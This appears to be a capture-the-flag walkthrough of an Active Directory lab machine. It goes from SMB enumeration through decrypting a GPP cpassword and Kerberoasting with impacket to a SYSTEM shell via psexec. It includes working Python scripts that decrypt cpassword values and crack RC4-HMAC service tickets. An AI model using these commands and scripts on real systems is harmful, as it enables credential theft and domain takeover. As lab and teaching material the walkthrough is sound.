Active
SMB info leak, GPP, Kerberoast
- LHOST: 10.10.14.15
- RHOST: 10.129.135.20
Port scan:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Script scan:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-09 14:08:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-07-09T14:09:11
|_ start_date: 2022-07-09T14:05:50
Full scan:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49171/tcp open unknown
49177/tcp open unknown
Script scan on the extra ports found by the full scan (5722, 9389, 47001, 49169, 49171, 49177):
PORT STATE SERVICE VERSION
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49177/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerate SMB shares with a null session (no credentials). The script scan reported SMB signing as required, so NTLM relay against this host is not an option, but anonymous share listing still works:
$ smbmap -H $IP
[+] IP: 10.129.135.20:445 Name: 10.129.135.20
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Recursively list directories and files in the \Replication share:
smbmap -H $IP -R Replication --depth 10
Note that the --depth flag is needed: smbmap only recurses 5 levels by default and the file we want sits deeper than that. Here we found an interesting file named Groups.xml, a Group Policy Preferences (GPP) file, which is worth a look because GPP files can carry account credentials in a cpassword attribute.
Download Groups.xml to Kali:
smbmap -H $IP -R Replication --depth 10 -A Groups.xml -q
In Groups.xml we found a username, active.htb\SVC_TGS, and a GPP password in the cpassword field:
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
A GPP cpassword is AES-256 ciphertext, but the key is fixed and published in Microsoft's own MS-GPPREF documentation, so it can be decrypted trivially with the gpp-decrypt tool built into Kali:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
The plaintext password is GPPstillStandingStrong2k18. MS14-025 stopped Windows from writing new cpassword values, but it did not remove existing ones from SYSVOL, which is why files like this still turn up. To learn the theory of this attack, read the following post: Finding Passwords in SYSVOL & Exploiting Group Policy Preferences (Active Directory Security).
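The decryption gpp-decrypt performs, as an added example that is not part of this write-up and not gpp-decrypt's own source: the cpassword above is base64-decoded and run through AES-256-CBC (zero IV) under the key Microsoft published, then PKCS#7-unpadded and decoded as UTF-16LE. AES is written out in pure Python so nothing needs installing; the key bytes come from MS-GPPREF 2.2.1.1.4 and the cpassword from the page, while the function and variable names are my own.

```python
"""Decrypt a Group Policy Preferences cpassword (the Groups.xml leak above).

Added example for this write-up, not gpp-decrypt's source. The only secret is
the 32-byte key Microsoft published in MS-GPPREF 2.2.1.1.4, so anyone who can
read SYSVOL can recover the plaintext.
"""
import base64

# Fixed key from MS-GPPREF 2.2.1.1.4 "Password Encryption".
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _xtime(a):
    """Multiply by x in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _gmul(a, b):
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _build_sbox():
    """S-box = multiplicative inverse (a^254) followed by the affine map."""
    rotl = lambda x, s: ((x << s) | (x >> (8 - s))) & 0xFF
    sbox = [0x63] * 256
    for a in range(1, 256):
        inv = 1
        for _ in range(254):
            inv = _gmul(inv, a)
        sbox[a] = inv ^ rotl(inv, 1) ^ rotl(inv, 2) ^ rotl(inv, 3) ^ rotl(inv, 4) ^ 0x63
    return sbox


SBOX = _build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]


def _expand_key(key):
    """AES-256 key schedule: 8 key words become 60 round-key words."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(8)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]  # extra SubWord for 256-bit keys
        w.append([w[i - 8][j] ^ t[j] for j in range(4)])
    return w


def _decrypt_block(w, block):
    """FIPS-197 InvCipher on one block; state index is row + 4 * column."""
    s = list(block)

    def add_round_key(rnd):
        for c in range(4):
            for r in range(4):
                s[r + 4 * c] ^= w[4 * rnd + c][r]

    def inv_shift_rows_sub_bytes():
        old = s[:]
        for r in range(4):
            for c in range(4):
                s[r + 4 * c] = INV_SBOX[old[r + 4 * ((c - r) % 4)]]

    def inv_mix_columns():
        m = (14, 11, 13, 9)  # row r of the inverse matrix is this vector rotated by r
        for c in range(4):
            a = s[4 * c:4 * c + 4]
            for r in range(4):
                s[4 * c + r] = 0
                for k in range(4):
                    s[4 * c + r] ^= _gmul(a[k], m[(k - r) % 4])

    add_round_key(14)
    for rnd in range(13, 0, -1):
        inv_shift_rows_sub_bytes()
        add_round_key(rnd)
        inv_mix_columns()
    inv_shift_rows_sub_bytes()
    add_round_key(0)
    return bytes(s)


def aes256_cbc_decrypt(key, iv, data):
    w, prev, out = _expand_key(key), iv, bytearray()
    for i in range(0, len(data), 16):
        out += bytes(x ^ y for x, y in zip(_decrypt_block(w, data[i:i + 16]), prev))
        prev = data[i:i + 16]
    return bytes(out)


def gpp_decrypt(cpassword):
    """cpassword -> plaintext: base64 (padding stripped on disk), AES-CBC, PKCS#7, UTF-16LE."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if len(raw) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    plain = aes256_cbc_decrypt(GPP_KEY, b"\x00" * 16, raw)
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or not a cpassword")
    return plain[:-pad].decode("utf-16-le")


def selftest():
    """FIPS-197 C.3 known-answer vector proves the AES-256 core above."""
    ct = bytes.fromhex("8ea2b7ca516745bfeafc49904b496089")
    return _decrypt_block(_expand_key(bytes(range(32))), ct) == bytes(range(0, 256, 17))


if __name__ == "__main__":
    assert selftest()
    # cpassword copied from the Groups.xml found in the Replication share above
    print(gpp_decrypt("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"))
```

The PKCS#7 check is the only thing standing between a wrong input and garbage output, which is also why gpp-decrypt fails loudly on a value that is not a real cpassword.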
Enumerate the SMB shares again with the credential we just obtained:
$ smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
[+] IP: 10.129.135.20:445 Name: 10.129.135.20
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Recursively list directories and files in the \Users share:
smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10
Here we found user.txt. Download it to Kali:
smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10 -A user.txt -q
Now we have a valid domain account, SVC_TGS, and its plaintext password GPPstillStandingStrong2k18. Any authenticated domain user can ask the KDC for a service ticket (TGS) for any account that has a servicePrincipalName, and that ticket is encrypted with the service account's own password hash, so in this scenario we can Kerberoast: request the tickets and crack them offline without ever touching the service. To learn the theory behind Kerberoast, read the following post: How To Attack Kerberos 101 (m0chan Blog).
Kerberoast with GetUserSPNs (-request asks for a ticket for every SPN account it finds):
$ impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-07-09 10:06:56.849348
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cff428e912c5afd03d8a2eb0aedfd97b$[...]
The SPN active/CIFS:445 is registered on the Administrator account itself, so the ticket we got back is encrypted with the domain administrator's password hash; the $krb5tgs$23$ prefix means etype 23 (RC4-HMAC), the cheapest Kerberos encryption type to crack. Save the TGS ticket to a file named hash.txt:
impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request -outputfile hash.txt
Crack the TGS ticket with John and the rockyou wordlist (john-rockyou appears to be a local wrapper; the plain equivalent is john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt, and John recognises the krb5tgs format from the $krb5tgs$23$ prefix on its own):
john-rockyou hash.txt
The plaintext password is Ticketmaster1968.
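What John computes for every candidate password when it cracks that hash, as an added example that is not part of this write-up and not John's or hashcat's code: the RFC 4757 etype-23 check (NT hash of the guess, HMAC-MD5 key derivation, RC4 decryption, checksum comparison). Because the Administrator hash above is truncated on the page, the block builds its own ticket for a fictitious svc_demo account with a made-up password (Summer2018!) and cracks it against a tiny wordlist; the account, SPN, realm, plaintext and password are all constructed, and MD4 is implemented inline because OpenSSL 3 builds of Python often disable it.

```python
"""Offline check behind cracking an etype-23 (RC4-HMAC) Kerberoast ticket.

Added example for this write-up, not John's or hashcat's code. Per candidate
password a cracker does exactly this: NT hash = MD4(UTF-16LE(pw)), derive the
RFC 4757 keys, RC4-decrypt the ticket, compare the HMAC-MD5 checksum. The
ticket below is constructed (fictitious account and password).
"""
import hashlib, hmac, os, struct


def md4(data):
    """RFC 1320 MD4; only needed for the NT hash."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                p = (-i) % 4  # a, d, c, b are updated in turn
                v[p] = rotl((v[p] + fn(v[(p + 1) % 4], v[(p + 2) % 4], v[(p + 3) % 4])
                             + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
        state = [(s + t) & 0xFFFFFFFF for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for ch in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(ch ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key, msg):
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4hmac_encrypt(nt, usage, plaintext, confounder=None):
    """RFC 4757 encrypt: checksum(16) || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(nt, struct.pack("<I", usage))
    body = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, body)
    return checksum + rc4(_hmac_md5(k1, checksum), body)


def rc4hmac_check(nt, usage, checksum, edata):
    """The cracker's test: does this NT hash unwrap the ticket to a valid checksum?"""
    k1 = _hmac_md5(nt, struct.pack("<I", usage))
    body = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, body), checksum)


def parse_krb5tgs23(line):
    """Split a GetUserSPNs line: $krb5tgs$23$*user$REALM$spn*$<checksum hex>$<edata hex>."""
    if not line.startswith("$krb5tgs$23$*"):
        raise ValueError("only etype 23 (RC4-HMAC) is handled here")
    label, rest = line[len("$krb5tgs$23$*"):].split("*$", 1)
    checksum, edata = rest.split("$", 1)
    return label, bytes.fromhex(checksum), bytes.fromhex(edata)


def kerberoast(line, wordlist, usage=2):
    """First candidate whose NT hash validates the ticket, else None.
    Key usage 2 is what the KDC uses for the service-ticket enc-part."""
    _, checksum, edata = parse_krb5tgs23(line)
    for candidate in wordlist:
        if rc4hmac_check(nt_hash(candidate), usage, checksum, edata):
            return candidate
    return None


def build_sample_line():
    """Constructed ticket for a fictitious svc_demo account (NOT the page's hash)."""
    blob = rc4hmac_encrypt(nt_hash("Summer2018!"), 2,
                           b"stand-in for the ASN.1 EncTicketPart", confounder=b"\x00" * 8)
    return "$krb5tgs$23$*svc_demo$EXAMPLE.LOCAL$MSSQLSvc/sql.example.local:1433*$%s$%s" % (
        blob[:16].hex(), blob[16:].hex())


def selftest():
    """NT hash of 'password' is a well-known constant; proves the MD4 above."""
    return nt_hash("password").hex() == "8846f7eaee8fb117ad06bdd830b7586c"


if __name__ == "__main__":
    assert selftest()
    line = build_sample_line()
    print(line)
    print("cracked:", kerberoast(line, ["Ticketmaster1968", "Welcome1", "Summer2018!"]))
```

A real line from hash.txt can be fed to kerberoast() with a wordlist to reproduce the John result. The per-guess cost here is one MD4 plus three HMAC-MD5 and one RC4 pass, which is why etype 23 tickets fall so fast; AES tickets ($krb5tgs$17$ and $krb5tgs$18$) need a PBKDF2 key derivation per guess instead of a single MD4, so hardening a service account to AES-only and a long password is the practical fix.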
PsExec to a SYSTEM shell with the cracked Administrator password (impacket-psexec uploads a service binary to a writable share and registers it as a service, so it is loud on a monitored network; impacket-wmiexec leaves less behind):
impacket-psexec active.htb/Administrator:Ticketmaster1968@$IP